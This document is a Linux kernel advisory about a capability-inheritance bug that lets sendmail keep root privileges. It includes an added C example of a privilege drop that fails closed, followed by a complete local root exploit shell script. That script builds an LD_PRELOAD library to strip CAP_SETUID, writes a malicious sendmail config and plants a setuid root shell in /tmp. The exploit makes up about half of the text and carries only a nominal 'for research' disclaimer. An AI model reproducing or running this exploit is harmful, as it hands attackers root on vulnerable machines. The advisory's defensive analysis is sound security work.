Description
Linux kernel vulnerability allows local attackers to gain administrator (root) privileges via sendmail
Affected systems
Linux 2.3 (development)
Linux 2.4.0-test1
Linux 2.1.15 and prior
Unaffected systems
Linux 2.1.16 and above
Using "capabilities" to constrain privileged processes was meant to be an effective security measure: by specifying certain capabilities, a program obtains only the level of access it actually needs. The problem is that capabilities are copied on fork(), which means that a capability set configured in the parent process is passed on to the child. If CAP_SETUID is disabled in the parent, the child cannot perform a setuid() call. This can create a security problem: if sendmail is executed in such a child process, then when sendmail tries to drop root privileges with setuid(getuid()), the call does not actually take effect, so sendmail keeps running as root, and an attacker could use .forward to obtain root privileges.
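As an added example (not part of the advisory or of sendmail's code), the check that would have contained this bug: a privilege-drop routine that treats a failed or ineffective setuid() as fatal instead of carrying on. The setter function pointers and the `denied_setuid` stub are constructed here so the capability-denied path can be exercised without root.

```c
/* Added example, not from the advisory: a privilege drop that fails closed. sendmail
 * assumed setuid(getuid()) could not fail; with CAP_SETUID gone from the inherited set it did. */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

typedef int (*setuid_fn)(uid_t);
typedef int (*setgid_fn)(gid_t);

/* Drop to uid/gid with the supplied setters, then verify with the getters.
 * Returns 0 only if both calls succeeded and the real and effective IDs match;
 * -1 means the caller must abort instead of carrying on with its old IDs. */
int drop_privileges_with(setgid_fn do_setgid, setuid_fn do_setuid,
                         uid_t uid, gid_t gid) {
    /* Group first: after the uid changes, setgid() may no longer be permitted. */
    if (do_setgid(gid) != 0) {
        fprintf(stderr, "setgid(%u) failed: %s\n", (unsigned)gid, strerror(errno));
        return -1;
    }
    if (do_setuid(uid) != 0) {
        fprintf(stderr, "setuid(%u) failed: %s\n", (unsigned)uid, strerror(errno));
        return -1;
    }
    /* Return codes alone are not proof; confirm the IDs actually changed. */
    if (getuid() != uid || geteuid() != uid || getgid() != gid || getegid() != gid) {
        fputs("privilege drop did not take effect\n", stderr);
        return -1;
    }
    return 0;
}

/* Production entry point using the real setgid()/setuid(). */
int drop_privileges(uid_t uid, gid_t gid) {
    return drop_privileges_with(setgid, setuid, uid, gid);
}

/* Constructed stub standing in for a kernel that refuses setuid() because
 * CAP_SETUID is missing from the calling process's capability set. */
static int denied_setuid(uid_t uid) {
    (void)uid;
    errno = EPERM;
    return -1;
}
/* Reproduces the advisory's failure mode without root: setgid() passes,
 * setuid() is refused, and the drop is reported as failed rather than ignored. */
int demo_denied_drop(void) {
    return drop_privileges_with(setgid, denied_setuid, getuid(), getgid());
}
```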
The following code is intended solely for testing and researching this vulnerability; if you use it for improper purposes, you bear the consequences yourself.
#!/bin/sh
echo "+-----------------------------------------------------------+"
echo "| Linux kernel 2.2.X (X<=15) & sendmail <= 8.10.1 |"
echo "| local root exploit |"
echo "| |"
echo "| Bugs found and exploit written by Wojciech Purczynski |"
echo "| wp@elzabsoft.pl cliph/ircnet Vooyec/dalnet |"
echo "+-----------------------------------------------------------+"
TMPDIR=/tmp/foo
SUIDSHELL=/tmp/sush
SHELL=/bin/tcsh
umask 022
echo "Creating temporary directory"
mkdir -p $TMPDIR
cd $TMPDIR
echo "Creating anti-noexec library (capdrop.c)"
cat <<_FOE_ > capdrop.c
#define __KERNEL__
#include
#undef __KERNEL__
#include
_syscall2(int, capset, cap_user_header_t, header, const cap_user_data_t, data)
extern int capset(cap_user_header_t header, cap_user_data_t data);
void unsetenv(const char*);
void _init(void) {
struct __user_cap_header_struct caph={_LINUX_CAPABILITY_VERSION, 0};
struct __user_cap_data_struct capd={0, 0, 0xfffffe7f};
unsetenv("LD_PRELOAD");
capset(&caph, &capd);
system("echo|/usr/sbin/sendmail -C$TMPDIR/sm.cf $USER");
}
_FOE_
echo "Compiling anti-noexec library (capdrop.so)"
cc capdrop.c -c -o capdrop.o
ld -shared capdrop.o -o capdrop.so
echo "Creating suid shell (sush.c)"
cat <<_FOE_ > sush.c
#include
int main() { setuid(0); setgid(0); execl("/bin/sh", "sh", NULL); }
_FOE_
echo "Compiling suid shell (sush.c)"
cc sush.c -o $TMPDIR/sush
echo "Creating shell script"
cat <<_FOE_ >script
mv $TMPDIR/sush $SUIDSHELL
chown root.root $SUIDSHELL
chmod 4111 $SUIDSHELL
exit 0
_FOE_
echo "Creating own sm.cf"
cat <<_FOE_ >$TMPDIR/sm.cf
O QueueDirectory=$TMPDIR
O ForwardPath=/no_forward_file
S0
R\$* \$#local \$: \$1
Mlocal, P=$SHELL, F=lsDFMAw5:/|@qSPfhn9, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,
T=DNS/RFC822/X-Unix, A=$SHELL $TMPDIR/script
_FOE_
echo "Dropping CAP_SETUID and calling sendmail"
export LD_PRELOAD=$TMPDIR/capdrop.so
/bin/true
unset LD_PRELOAD
echo "Waiting for suid shell ($SUIDSHELL)"
while [ ! -f $SUIDSHELL ]; do sleep 1; done
echo "Removing everything"
cd ..
rm -fr $TMPDIR
echo "Suid shell at $SUIDSHELL"
$SUIDSHELL